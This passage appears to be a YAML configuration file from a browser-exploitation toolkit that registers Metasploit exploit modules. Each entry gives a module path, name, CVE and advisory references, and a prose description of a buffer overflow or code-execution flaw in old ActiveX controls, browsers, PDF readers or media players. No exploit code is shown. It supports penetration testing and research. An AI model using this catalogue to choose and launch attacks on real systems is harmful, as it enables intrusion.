- http://xcon.xfocus.net/XCon2010_ChenXie_EN.pdf
- - URL
- http://www.breakingpointsystems.com/community/blog/ie-vulnerability/
- - MSB
- MS11-003
path: extensions/metasploit/
class: Msf_module
msf_creative_software_cachefolder:
enable: true
msf: true
msf_key: windows/browser/creative_software_cachefolder
name: Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When\n\
\t\t\t\tsending an overly long string to the cachefolder() property of CTSUEng.ocx\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0955
- - OSVDB
- "45655"
path: extensions/metasploit/
class: Msf_module
msf_webex_ucf_newobject:
enable: true
msf: true
msf_key: windows/browser/webex_ucf_newobject
name: WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n\
\t\t\t\tActiveX Control. If an long string is passed to the 'NewObject' method, a stack-\n\
\t\t\t\tbased buffer overflow will occur when copying attacker-supplied data using the\n\
\t\t\t\tsprintf function.\n\n\
\t\t\t\tIt is noteworthy that this vulnerability was discovered and reported by multiple\n\
\t\t\t\tindependent researchers. To quote iDefense's advisory, \"Before this issue was\n\
\t\t\t\tpublicly reported, at least three independent security researchers had knowledge\n\
\t\t\t\tof this issue; thus, it is reasonable to believe that even more people were aware\n\
\t\t\t\tof this issue before disclosure.\"\n\n\
\t\t\t\tNOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n\
\t\t\t\tinto memory unmodified.\n\
\t\t\t"
authors:
- - CVE
- 2008-3558
- - OSVDB
- "47344"
- - BID
- "30578"
- - URL
- http://www.exploit-db.com/exploits/6220
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849
- - URL
- http://www.trapkit.de/advisories/TKADV2008-009.txt
- - URL
- http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html
- - URL
- http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml
path: extensions/metasploit/
class: Msf_module
msf_winamp_playlist_unc:
enable: true
msf: true
msf_key: windows/browser/winamp_playlist_unc
name: Winamp Playlist UNC Path Computer Name Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Winamp media player.\n\
\t\t\t\tThis flaw is triggered when a audio file path is specified, inside a\n\
\t\t\t\tplaylist, that consists of a UNC path with a long computer name. This\n\
\t\t\t\tmodule delivers the playlist via the browser. This module has only\n\
\t\t\t\tbeen successfully tested on Winamp 5.11 and 5.12.\n\
\t\t\t"
authors:
- - CVE
- 2006-0476
- - OSVDB
- "22789"
- - BID
- "16410"
path: extensions/metasploit/
class: Msf_module
msf_real_arcade_installerdlg:
enable: true
msf: true
msf_key: windows/browser/real_arcade_installerdlg
name: Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in Real Networks Acrade Game's ActiveX control. The \"exec\"\n\
\t\t\t\tfunction found in InstallerDlg.dll (v2.6.0.445) allows remote attackers to run arbitrary commands\n\
\t\t\t\ton the victim machine.\n\
\t\t\t"
authors:
- - OSVDB
- "71559"
- - URL
- http://www.exploit-db.com/exploits/17105/
path: extensions/metasploit/
class: Msf_module
msf_apple_quicktime_marshaled_punk:
enable: true
msf: true
msf_key: windows/browser/apple_quicktime_marshaled_punk
name: Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a memory trust issue in Apple QuickTime\n\
\t\t\t\t7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX\n\
\t\t\t\tcontrol will treat a supplied parameter as a trusted pointer. It will\n\
\t\t\t\tthen use it as a COM-type pUnknown and lead to arbitrary code execution.\n\n\
\t\t\t\tThis exploit utilizes a combination of heap spraying and the\n\
\t\t\t\tQuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not\n\
\t\t\t\topt-in to ASLR. As such, this module should be reliable on all Windows\n\
\t\t\t\tversions.\n\n\
\t\t\t\tNOTE: The addresses may need to be adjusted for older versions of QuickTime.\n\
\t\t\t"
authors:
- - CVE
- 2010-1818
- - OSVDB
- "67705"
- - URL
- http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_executerequest:
enable: true
msf: true
msf_key: windows/browser/novelliprint_executerequest
name: Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 4.26. When\n\
\t\t\t\tsending an overly long string to the ExecuteRequest() property of ienipp.ocx\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-0935
- - OSVDB
- "42063"
- - BID
- "27939"
path: extensions/metasploit/
class: Msf_module
msf_ms06_013_createtextrange:
enable: true
msf: true
msf_key: windows/browser/ms06_013_createtextrange
name: Internet Explorer createTextRange() Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability in Microsoft Internet Explorer.\n\
\t\t\t\tBoth IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under\n\
\t\t\t\tcertain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point\n\
\t\t\t\tto a very remote, non-existent memory location. This module is the result of merging three\n\
\t\t\t\tdifferent exploit submissions and has only been reliably tested against Windows XP SP2.\n\
\t\t\t\tThis vulnerability was independently discovered by multiple parties. The heap spray method\n\
\t\t\t\tused by this exploit was pioneered by Skylined.\n\
\t\t\t"
authors:
- - CVE
- 2006-1359
- - OSVDB
- "24050"
- - MSB
- MS06-013
- - BID
- "17196"
- - US-CERT-VU
- "876678"
- - URL
- http://secunia.com/secunia_research/2006-7/advisory/
- - URL
- http://seclists.org/lists/bugtraq/2006/Mar/0410.html
- - URL
- http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html
- - URL
- http://www.shog9.com/crashIE.html
path: extensions/metasploit/
class: Msf_module
msf_ms06_001_wmf_setabortproc:
enable: true
msf: true
msf_key: windows/browser/ms06_001_wmf_setabortproc
name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the GDI library included with\n\
\t\t\t\tWindows XP and 2003. This vulnerability uses the 'Escape' metafile function\n\
\t\t\t\tto execute arbitrary code through the SetAbortProc procedure. This module\n\
\t\t\t\tgenerates a random WMF record stream for each request.\n\
\t\t\t"
authors:
- - CVE
- 2005-4560
- - OSVDB
- "21987"
- - MSB
- MS06-001
- - BID
- "16074"
- - URL
- http://www.microsoft.com/technet/security/advisory/912840.mspx
- - URL
- http://wvware.sourceforge.net/caolan/ora-wmf.html
- - URL
- http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt
path: extensions/metasploit/
class: Msf_module
msf_enjoysapgui_preparetoposthtml:
enable: true
msf: true
msf_key: windows/browser/enjoysapgui_preparetoposthtml
name: EnjoySAP SAP GUI ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SAP KWEdit ActiveX\n\
\t\t\t\tControl (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending\n\
\t\t\t\tan overly long string to the \"PrepareToPostHTML()\" method, an attacker\n\
\t\t\t\tmay be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-3605
- - OSVDB
- "37690"
- - BID
- "24772"
path: extensions/metasploit/
class: Msf_module
msf_ms07_017_ani_loadimage_chunksize:
enable: true
msf: true
msf_key: windows/email/ms07_017_ani_loadimage_chunksize
name: Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a buffer overflow vulnerability in the\n\
\t\t\t\tLoadAniIcon() function of USER32.dll. The flaw is triggered\n\
\t\t\t\tthrough Outlook Express by using the CURSOR style sheet\n\
\t\t\t\tdirective to load a malicious .ANI file.\n\n\
\t\t\t\tThis vulnerability was discovered by Alexander Sotirov of Determina\n\
\t\t\t\tand was rediscovered, in the wild, by McAfee.\n\
\t\t\t"
authors:
- - MSB
- MS07-017
- - CVE
- 2007-0038
- - CVE
- 2007-1765
- - OSVDB
- "33629"
- - BID
- "23194"
- - URL
- http://www.microsoft.com/technet/security/advisory/935423.mspx
- - URL
- http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp
- - URL
- http://www.determina.com/security.research/vulnerabilities/ani-header.html
path: extensions/metasploit/
class: Msf_module
msf_adobe_cooltype_sing:
enable: true
msf: true
msf_key: windows/fileformat/adobe_cooltype_sing
name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\n\
\t\t\t\thandling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are\n\
\t\t\t\tassumed to be vulnerable as well.\n\
\t\t\t"
authors:
- - CVE
- 2010-2883
- - OSVDB
- "67849"
- - URL
- http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
- - URL
- http://www.adobe.com/support/security/advisories/apsa10-02.html
path: extensions/metasploit/
class: Msf_module
msf_nis2004_antispam:
enable: true
msf: true
msf_key: windows/browser/nis2004_antispam
name: Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Norton AntiSpam 2004. When\n\
\t\t\t\tsending an overly long string to the LaunchCustomRuleWizard() method\n\
\t\t\t\tof symspam.dll (2004.1.0.147) an attacker may be able to execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2004-0363
- - OSVDB
- "6249"
- - BID
- "9916"
path: extensions/metasploit/
class: Msf_module
msf_symantec_altirisdeployment_downloadandinstall:
enable: true
msf: true
msf_key: windows/browser/symantec_altirisdeployment_downloadandinstall
name: Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module allows remote attackers to install and execute arbitrary files on a users file system via\n\
\t\t\t\tAeXNSPkgDLLib.dll (6.0.0.1418). This module was tested against Symantec Altiris Deployment Solution 6.9 sp3.\n\
\t\t\t"
authors:
- - BID
- "36346"
- - CVE
- 2009-3028
- - OSVDB
- "57893"
path: extensions/metasploit/
class: Msf_module
msf_softartisans_getdrivename:
enable: true
msf: true
msf_key: windows/browser/softartisans_getdrivename
name: SoftArtisans XFile FileManager ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in SoftArtisans XFile FileManager ActiveX control\n\
\t\t\t\t(SAFmgPwd.dll 2.0.5.3). When sending an overly long string to the GetDriveName() method\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-1682
- - OSVDB
- "47794"
- - US-CERT-VU
- "914785"
- - BID
- "30826"
path: extensions/metasploit/
class: Msf_module
msf_apple_quicktime_rtsp:
enable: true
msf: true
msf_key: windows/browser/apple_quicktime_rtsp
name: Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Apple QuickTime\n\
\t\t\t\t7.1.3. This module was inspired by MOAB-01-01-2007. The\n\
\t\t\t\tBrowser target for this module was tested against IE 6 and\n\
\t\t\t\tFirefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the\n\
\t\t\t\tQuickTime plugin.\n\
\t\t\t"
authors:
- - CVE
- 2007-0015
- - OSVDB
- "31023"
- - BID
- "21829"
- - URL
- http://projects.info-pull.com/moab/MOAB-01-01-2007.html
path: extensions/metasploit/
class: Msf_module
msf_novelliprint_getdriversettings_2:
enable: true
msf: true
msf_key: windows/browser/novelliprint_getdriversettings_2
name: Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell iPrint Client 5.52. When\n\
\t\t\t\tsending an overly long string to the GetDriverSettings() property of ienipp.ocx\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2010-4321
- - BID
- "44966"
- - OSVDB
- "69357"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-256/
- - URL
- http://www.exploit-db.com/exploits/16014/
- - URL
- http://www.novell.com/support/viewContent.do?externalId=7007234
path: extensions/metasploit/
class: Msf_module
msf_ca_brightstor_addcolumn:
enable: true
msf: true
msf_key: windows/browser/ca_brightstor_addcolumn
name: CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThe CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based\n\
\t\t\t\tbuffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker\n\
\t\t\t\tcould overflow a buffer and execute arbitrary code on the system.\n\
\t\t\t"
authors:
- - CVE
- 2008-1472
- - OSVDB
- "43214"
path: extensions/metasploit/
class: Msf_module
msf_symantec_consoleutilities_browseandsavefile:
enable: true
msf: true
msf_key: windows/browser/symantec_consoleutilities_browseandsavefile
name: Symantec ConsoleUtilities ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Symantecs ConsoleUtilities.\n\
\t\t\t\tBy sending an overly long string to the \"BrowseAndSaveFile()\" method located\n\
\t\t\t\tin the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an attacker may be able to\n\
\t\t\t\texecute arbitrary code\n\
\t\t\t"
authors:
- - CVE
- 2009-3031
- - OSVDB
- "59597"
- - BID
- "36698"
- - URL
- http://sotiriu.de/adv/NSOADV-2009-001.txt
- - URL
- http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00
path: extensions/metasploit/
class: Msf_module
msf_yahoomessenger_fvcom:
enable: true
msf: true
msf_key: windows/browser/yahoomessenger_fvcom
name: Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n\
\t\t\t\tControl (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string\n\
\t\t\t\tto the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4515
- - OSVDB
- "37739"
- - BID
- "25494"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591
path: extensions/metasploit/
class: Msf_module
msf_aol_ampx_convertfile:
enable: true
msf: true
msf_key: windows/browser/aol_ampx_convertfile
name: AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in AOL IWinAmpActiveX\n\
\t\t\t\tclass (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.\n\
\t\t\t\tBy setting an overly long value to 'ConvertFile()', an attacker can overrun\n\
\t\t\t\ta buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "54706"
- - BID
- "35028"
- - URL
- http://www.milw0rm.com/exploits/8733
path: extensions/metasploit/
class: Msf_module
msf_adobe_utilprintf:
enable: true
msf: true
msf_key: windows/fileformat/adobe_utilprintf
name: Adobe util.printf() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional\n\
\t\t\t\t< 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf()\n\
\t\t\t\tentry, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-2992
- - OSVDB
- "49520"
path: extensions/metasploit/
class: Msf_module
msf_macrovision_downloadandexecute:
enable: true
msf: true
msf_key: windows/browser/macrovision_downloadandexecute
name: Macrovision InstallShield Update Service Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Macrovision InstallShield Update\n\
\t\t\t\tService(Isusweb.dll 6.0.100.54472). By passing an overly long ProductCode string to\n\
\t\t\t\tthe DownloadAndExecute method, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-5660
- - OSVDB
- "38347"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-December/059288.html
path: extensions/metasploit/
class: Msf_module
msf_webdav_dll_hijacker:
enable: true
msf: true
msf_key: windows/browser/webdav_dll_hijacker
name: WebDAV Application DLL Hijacker
category: Metasploit
description: "\n\
\t\t\t\tThis module presents a directory of file extensions that can lead to\n\
\t\t\tcode execution when opened from the share. The default EXTENSIONS option\n\
\t\t\tmust be configured to specify a vulnerable application type.\n\
\t\t\t"
authors:
- - URL
- http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
- - URL
- http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt
path: extensions/metasploit/
class: Msf_module
msf_adobe_flatedecode_predictor02:
enable: true
msf: true
msf_key: windows/fileformat/adobe_flatedecode_predictor02
name: Adobe FlateDecode Stream Predictor 02 Integer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an integer overflow vulnerability in Adobe Reader and Adobe\n\
\t\t\t\tAcrobat Professional versions before 9.2.\n\
\t\t\t"
authors:
- - CVE
- 2009-3459
- - BID
- "36600"
- - OSVDB
- "58729"
- - URL
- http://blogs.adobe.com/psirt/2009/10/adobe_reader_and_acrobat_issue_1.html
- - URL
- http://www.adobe.com/support/security/bulletins/apsb09-15.html
- - URL
- http://www.fortiguard.com/analysis/pdfanalysis.html
path: extensions/metasploit/
class: Msf_module
msf_winamp_ultravox:
enable: true
msf: true
msf_key: windows/browser/winamp_ultravox
name: Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Winamp 5.24. By\n\
\t\t\t\tsending an overly long artist tag, a remote attacker may\n\
\t\t\t\tbe able to execute arbitrary code. This vulnerability can be\n\
\t\t\t\texploited from the browser or the winamp client itself.\n\
\t\t\t"
authors:
- - CVE
- 2008-0065
- - OSVDB
- "41707"
- - BID
- "27344"
path: extensions/metasploit/
class: Msf_module
msf_baofeng_storm_onbeforevideodownload:
enable: true
msf: true
msf_key: windows/browser/baofeng_storm_onbeforevideodownload
name: BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX\n\
\t\t\t\tcontrol. Verions of mps.dll including 3.9.4.27 and lower are affected. When passing\n\
\t\t\t\tan overly long string to the method \"OnBeforeVideoDownload\" an attacker can execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-1612
- - OSVDB
- "54169"
- - BID
- "34789"
- - URL
- http://www.exploit-db.com/exploits/8579
path: extensions/metasploit/
class: Msf_module
msf_adobe_media_newplayer:
enable: true
msf: true
msf_key: windows/fileformat/adobe_media_newplayer
name: Adobe Doc.media.newPlayer Use After Free Vulnerability
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat\n\
\t\t\t\tProfessional versions up to and including 9.2.\n\
\t\t\t"
authors:
- - CVE
- 2009-4324
- - BID
- "37331"
- - OSVDB
- "60980"
path: extensions/metasploit/
class: Msf_module
msf_oracle_dc_submittoexpress:
enable: true
msf: true
msf_key: windows/browser/oracle_dc_submittoexpress
name: Oracle Document Capture 10g ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Oracle Document Capture 10g (10.1.3.5.0).\n\
\t\t\t\tOracle Document Capture 10g comes bundled with a third party ActiveX control\n\
\t\t\t\temsmtp.dll (6.0.1.0). When passing a overly long string to the method \"SubmitToExpress\"\n\
\t\t\t\tan attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-4607
- - OSVDB
- "38335"
- - BID
- "25467"
- - US-CERT-VU
- "281977"
path: extensions/metasploit/
class: Msf_module
msf_ms08_070_visual_studio_msmask:
enable: true
msf: true
msf_key: windows/browser/ms08_070_visual_studio_msmask
name: Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Microsoft's Visual Studio 6.0.\n\
\t\t\t\tWhen passing a specially crafted string to the Mask parameter of the\n\
\t\t\t\tMsmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2008-3704
- - OSVDB
- "47475"
- - BID
- "30674"
- - MSB
- MS08-070
path: extensions/metasploit/
class: Msf_module
msf_macrovision_unsafe:
enable: true
msf: true
msf_key: windows/browser/macrovision_unsafe
name: Macrovision InstallShield Update Service ActiveX Unsafe Method
category: Metasploit
description: "\n\
\t\t\t\tThis module allows attackers to execute code via an unsafe methods in Macrovision InstallShield 2008.\n\
\t\t\t"
authors:
- - CVE
- 2007-5660
- - OSVDB
- "38347"
- - BID
- "26280"
path: extensions/metasploit/
class: Msf_module
msf_nctaudiofile2_setformatlikesample:
enable: true
msf: true
msf_key: windows/browser/nctaudiofile2_setformatlikesample
name: NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the NCTAudioFile2.Audio ActiveX\n\
\t\t\t\tControl provided by various audio applications. By sending a overly long\n\
\t\t\t\tstring to the \"SetFormatLikeSample()\" method, an attacker may be able to\n\
\t\t\t\texecute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2007-0018
- - OSVDB
- "32032"
- - BID
- "22196"
- - US-CERT-VU
- "292713"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/062911.html
path: extensions/metasploit/
class: Msf_module
msf_ms10_022_ie_vbscript_winhlp32:
enable: true
msf: true
msf_key: windows/browser/ms10_022_ie_vbscript_winhlp32
name: Internet Explorer Winhlp32.exe MsgBox Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a code execution vulnerability that occurs when a user\n\
\t\t\t\tpresses F1 on MessageBox originated from VBscript within a web page. When the\n\
\t\t\t\tuser hits F1, the MessageBox help functionaility will attempt to load and use\n\
\t\t\t\ta HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server.\n\n\
\t\t\t\tThis particular version of the exploit implements a WebDAV server that will\n\
\t\t\t\tserve HLP file as well as a payload EXE. During testing warnings about the\n\
\t\t\t\tpayload EXE being unsigned were witnessed. A future version of this module\n\
\t\t\t\tmight use other methods that do not create such a warning.\n\
\t\t\t"
authors:
- - CVE
- 2010-0483
- - OSVDB
- "62632"
- - MSB
- MS10-023
- - URL
- http://www.microsoft.com/technet/security/advisory/981169.mspx
- - URL
- http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx
- - URL
- http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt
path: extensions/metasploit/
class: Msf_module
msf_sapgui_saveviewtosessionfile:
enable: true
msf: true
msf_key: windows/browser/sapgui_saveviewtosessionfile
name: SAP AG SAPgui EAI WebViewer3D Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Siemens Unigraphics Solutions\n\
\t\t\t\tTeamcenter Visualization EAI WebViewer3D ActiveX control that is bundled\n\
\t\t\t\twith SAPgui. When passing an overly long string the SaveViewToSessionFile()\n\
\t\t\t\tmethod, arbitrary code may be executed.\n\
\t\t\t"
authors:
- - CVE
- 2007-4475
- - OSVDB
- "53066"
- - US-CERT-VU
- "985449"
path: extensions/metasploit/
class: Msf_module
msf_lpviewer_url:
enable: true
msf: true
msf_key: windows/browser/lpviewer_url
name: iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When\n\
\t\t\t\tsending an overly long string to the URL() property an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2008-4384
- - OSVDB
- "48946"
- - US-CERT-VU
- "848873"
- - BID
- "31604"
path: extensions/metasploit/
class: Msf_module
msf_amaya_bdo:
enable: true
msf: true
msf_key: windows/browser/amaya_bdo
name: Amaya Browser v11.0 bdo tag overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Amaya v11 Browser.\n\
\t\t\t\t\tBy sending an overly long string to the \"bdo\"\n\
\t\t\t\t\ttag, an attacker may be able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-0323
- - OSVDB
- "55721"
- - BID
- 33046, 33047
path: extensions/metasploit/
class: Msf_module
msf_xmplay_asx:
enable: true
msf: true
msf_key: windows/browser/xmplay_asx
name: XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n\
\t\t\t\tThe vulnerability is caused due to a boundary error within\n\
\t\t\t\tthe parsing of playlists containing an overly long file name.\n\
\t\t\t\tThis module uses the ASX file format.\n\
\t\t\t"
authors:
- - CVE
- 2006-6063
- - OSVDB
- "30537"
- - BID
- "21206"
- - URL
- http://secunia.com/advisories/22999/
path: extensions/metasploit/
class: Msf_module
msf_java_basicservice_impl:
enable: true
msf: true
msf_key: windows/browser/java_basicservice_impl
name: Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit
category: Metasploit
description: "\n\
\t\t\tThis module exploits a vulnerability in Java Runtime Environment\n\
\t\t\tthat allows an attacker to escape the Java Sandbox. By injecting\n\
\t\t\ta parameter into a javaws call within the BasicServiceImpl class\n\
\t\t\tthe default java sandbox policy file can be therefore overwritten.\n\
\t\t\tThe vulnerability affects version 6 prior to update 22.\n\n\
\t\t\tNOTE: Exploiting this vulnerability causes several sinister-looking\n\
\t\t\tpopup windows saying that Java is \"Downloading application.\"\n\
\t\t\t"
authors:
- - CVE
- 2010-3563
- - OSVDB
- "69043"
- - URL
- http://mk41ser.blogspot.com
path: extensions/metasploit/
class: Msf_module
msf_cisco_anyconnect_exec:
enable: true
msf: true
msf_key: windows/browser/cisco_anyconnect_exec
name: Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Cisco AnyConnect VPN client \n\
\t\t\t\tvpnweb.ocx ActiveX control. This control is typically used to install the \n\
\t\t\t\tVPN client. An attacker can set the 'url' property which is where the control\n\
\t\t\t\ttries to locate the files needed to install the client.\n\n\
\t\t\t\t\tThe control tries to download two files from the site specified within the\n\
\t\t\t\t'url' property. One of these files it will be stored in a temporary directory and \n\
\t\t\t\texecuted.\n\
\t\t\t\t\t"
authors:
- - CVE
- 2011-2039
- - OSVDB
- "72714"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909
- - URL
- http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml
path: extensions/metasploit/
class: Msf_module
msf_ie_iscomponentinstalled:
enable: true
msf: true
msf_key: windows/browser/ie_iscomponentinstalled
name: Internet Explorer isComponentInstalled Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Internet Explorer. This bug was\n\
\t\t\t\tpatched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.\n\
\t\t\t"
authors:
- - CVE
- 2006-1016
- - OSVDB
- "31647"
- - BID
- "16870"
path: extensions/metasploit/
class: Msf_module
msf_athocgov_completeinstallation:
enable: true
msf: true
msf_key: windows/browser/athocgov_completeinstallation
name: AtHocGov IWSAlerts ActiveX Control Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in AtHocGov IWSAlerts. When\n\
\t\t\t\tsending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll\n\
\t\t\t\t(6.1.4.36) an attacker may be able to execute arbitrary code. This\n\
\t\t\t\tvulnerability was silently patched by the vendor.\n\
\t\t\t"
authors:
- - URL
- http://www.athoc.com/products/IWSAlerts_overview.aspx
path: extensions/metasploit/
class: Msf_module
msf_mirc_irc_url:
enable: true
msf: true
msf_key: windows/browser/mirc_irc_url
name: mIRC IRC URL Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in mIRC 6.1. By\n\
\t\t\t\tsubmitting an overly long and specially crafted URL to\n\
\t\t\t\tthe 'irc' protocol, an attacker can overwrite the buffer\n\
\t\t\t\tand control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2003-1336
- - OSVDB
- "2665"
- - BID
- "8819"
path: extensions/metasploit/
class: Msf_module
msf_symantec_backupexec_pvcalendar:
enable: true
msf: true
msf_key: windows/browser/symantec_backupexec_pvcalendar
name: Symantec BackupExec Calendar Control Buffer Overflow
category: Metasploit
description: "\n\
